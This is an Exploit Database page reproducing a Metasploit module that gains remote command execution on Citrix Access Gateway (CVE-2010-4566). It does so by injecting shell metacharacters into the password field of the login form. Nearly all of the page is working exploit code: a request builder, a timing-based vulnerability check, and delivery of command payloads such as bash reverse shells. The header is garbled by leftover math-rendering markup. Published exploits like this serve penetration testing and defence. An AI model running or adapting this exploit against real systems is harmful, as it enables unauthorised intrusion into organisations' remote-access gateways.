OffSec’s Exploit Database Archive (original) (raw)

Citrix Access Gateway - Command Execution (Metasploit)

Platform:

Linux

Date:

2011-03-03

##
# <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>I</mi><mi>d</mi><mo>:</mo><mi>c</mi><mi>i</mi><mi>t</mi><mi>r</mi><mi>i</mi><msub><mi>x</mi><mi>a</mi></msub><mi>c</mi><mi>c</mi><mi>e</mi><mi>s</mi><msub><mi>s</mi><mi>g</mi></msub><mi>a</mi><mi>t</mi><mi>e</mi><mi>w</mi><mi>a</mi><msub><mi>y</mi><mi>e</mi></msub><mi>x</mi><mi>e</mi><mi>c</mi><mi mathvariant="normal">.</mi><mi>r</mi><mi>b</mi><mn>118732011</mn><mo>−</mo><mn>03</mn><mo>−</mo><mn>0320</mn><mo>:</mo><mn>51</mn><mo>:</mo><mn>12</mn><mi>Z</mi><mi>j</mi><mi>d</mi><mi>u</mi><mi>c</mi><mi>k</mi></mrow><annotation encoding="application/x-tex">Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck </annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6944em;"></span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal">d</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:0.9805em;vertical-align:-0.2861em;"></span><span class="mord mathnormal">c</span><span class="mord mathnormal">i</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">i</span><span class="mord"><span class="mord mathnormal">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">a</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal">cces</span><span class="mord"><span class="mord mathnormal">s</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03588em;">g</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mord mathnormal">a</span><span class="mord mathnormal">t</span><span class="mord mathnormal">e</span><span class="mord mathnormal" style="margin-right:0.02691em;">w</span><span class="mord mathnormal">a</span><span class="mord"><span class="mord mathnormal" style="margin-right:0.03588em;">y</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">e</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathnormal">x</span><span class="mord mathnormal">ec</span><span class="mord">.</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">b</span><span class="mord">118732011</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222em;"></span></span><span class="base"><span class="strut" style="height:0.7278em;vertical-align:-0.0833em;"></span><span class="mord">03</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222em;"></span></span><span class="base"><span class="strut" style="height:0.6444em;"></span><span class="mord">0320</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:0.6444em;"></span><span class="mord">51</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:0.2778em;"></span></span><span class="base"><span class="strut" style="height:0.8889em;vertical-align:-0.1944em;"></span><span class="mord">12</span><span class="mord mathnormal" style="margin-right:0.07153em;">Z</span><span class="mord mathnormal" style="margin-right:0.05724em;">j</span><span class="mord mathnormal">d</span><span class="mord mathnormal">u</span><span class="mord mathnormal">c</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span></span></span></span>
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Citrix Access Gateway Command Execution',
            'Description'    => %q{
                    The Citrix Access Gateway provides support for multiple authentication types.
                When utilizing the external legacy NTLM authentication module known as
                ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
                line utility to verify a user's identity and password.  By embedding shell
                metacharacters in the web authentication form it is possible to execute
                arbitrary commands on the Access Gateway.
            },
            'Author'         =>
                [
                    'George D. Gal', # Original advisory
                    'Erwin Paternotte', # Exploit module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11873 $',
            'References'     =>
                [
                    [ 'CVE', '2010-4566' ],
                    [ 'OSVDB', '70099' ],
                    [ 'BID', '45402' ],
                    [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'       => 127,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd cmd_bash',
                            'RequiredCmd' => 'generic telnet bash-tcp'
                        }
                },
            'DefaultOptions' =>
                {
                    'WfsDelay' => 30
                },
            'Platform'       => [ 'unix' ],
            'Arch'           => ARCH_CMD,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Dec 21 2010',
            'DefaultTarget'  => 0))

        register_options(
            [
                Opt::RPORT(443),
                OptBool.new('SSL', [ true, 'Use SSL', true ]),
            ], self.class)

    end

    def post(command, background)
        username = rand_text_alphanumeric(20)

        if background
            sploit = Rex::Text.uri_encode('|' + command + '&')
        else
            sploit = Rex::Text.uri_encode('|' + command)
        end

        data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
        data << username
        data << "&password="
        data << sploit

        res = send_request_cgi({
            'uri'     => '/',
            'method'  => 'POST',
            'data'    => data
        }, 25)
    end

    def check
        print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

        # Try running/timing 'ping localhost' to determine is system is vulnerable
        start = Time.now
        post("ping -c 10 127.0.0.1", false)
        elapsed = Time.now - start
        if elapsed >= 3
            return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
    end

    def exploit
        cmd = payload.encoded

        if not post(cmd, true)
            raise RuntimeError, "Unable to execute the desired command"
        end
    end
end